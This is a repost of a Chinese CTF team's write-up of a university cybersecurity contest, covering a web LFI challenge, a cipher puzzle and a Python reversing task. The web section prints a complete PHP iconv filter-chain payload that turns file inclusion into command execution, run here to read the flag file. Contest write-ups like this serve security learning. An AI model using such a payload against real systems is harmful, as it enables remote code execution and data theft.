第三届陕西省大学生网络安全技能大赛-WriteUp

admin 2024年11月9日21:42:53评论13 views字数 3295阅读10分59秒阅读模式

EDI

JOIN US ▶▶▶

招新

EDI安全的CTF战队经常参与各大CTF比赛,了解CTF赛事。

欢迎各位师傅加入EDI,大家一起打CTF,一起进步。(诚招re crypto pwn 方向的师傅)有意向的师傅请联系邮箱root@edisec.net、shiyi@edisec.net(带上自己的简历,简历内容包括但不限于就读学校、个人ID、擅长技术方向、历史参与比赛成绩等等。

点击蓝字 ·  关注我们

01

Web(5x)

1

easyrce

LFI的题目 试了很多payload都过不去最后根据

https://blog.csdn.net/rfrder/article/details/122326155https://hwwg.github.io/2022/01/17/the-end-of-LFI/
构造paylaod
?PK=php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP866.CSUNICODE|convert.iconv.CSISOLATIN5.ISO_6937-2|convert.iconv.CP950.UTF-16BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.865.UTF16|convert.iconv.CP901.ISO6937|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.IBM869.UTF16|convert.iconv.L3.CSISO90|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.iconv.CSA_T500.L4|convert.iconv.ISO_8859-2.ISO-IR-103|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.863.UTF-16|convert.iconv.ISO6937.UTF16LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.BIG5|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L5.UTF-32|convert.iconv.ISO88594.GB13000|convert.iconv.CP950.SHIFT_JISX0213|convert.iconv.UHC.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.865.UTF16|convert.iconv.CP901.ISO6937|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP869.UTF-32|convert.iconv.MACUK.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.ISO88597.UTF16|convert.iconv.RK1POST:1=system("cat /fla*");
得到flag flag{04b6fc939af516292f2e15bc8fa0f9e6}
第三届陕西省大学生网络安全技能大赛-WriteUp

02

Misc

1

云缨

下载得到一个压缩包文件得到一个txt文件 得到一串数字
第三届陕西省大学生网络安全技能大赛-WriteUp
参考:https://blog.csdn.net/lilongsy/article/details/108483119?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522168577967016800188583789%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fall.%2522%257D&request_id=168577967016800188583789&biz_id=&utm_medium=distribute.pc_search_result.none-task-code-2~all~first_rank_ecpm_v1~rank_v31_ecpm-2-108483119-0-null-null.142^v88^control_2,239^v2^insert_chatgpt&utm_term=01248%E5%AF%86%E7%A0%81%28%E4%BA%91%E5%BD%B1%E5%AF%86%E7%A0%81
手动解密 得到Y U N Y I N G I S E A S Y
第三届陕西省大学生网络安全技能大赛-WriteUp

Y U N Y I N G I S E A S Y进行大小写去掉空格转md5不断测试得到正确flag ,flag应该是32位小写那个,测试太多忘记哪个正确的了。

第三届陕西省大学生网络安全技能大赛-WriteUp

第三届陕西省大学生网络安全技能大赛-WriteUp

04

Re

1

ezpython

直接exe转py得到源码进行逆向得到flag
参考:https://blog.csdn.net/weixin_49764009/article/details/120340153
第三届陕西省大学生网络安全技能大赛-WriteUp
构造脚本得到flag flag{524f20b378d8a78dff744f545e49ebdf}
第三届陕西省大学生网络安全技能大赛-WriteUp

EDI安全

第三届陕西省大学生网络安全技能大赛-WriteUp

扫二维码|关注我们

一个专注渗透实战经验分享的公众号

原文始发于微信公众号(EDI安全):第三届陕西省大学生网络安全技能大赛-WriteUp

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年11月9日21:42:53
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   第三届陕西省大学生网络安全技能大赛-WriteUphttps://cn-sec.com/archives/1792135.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息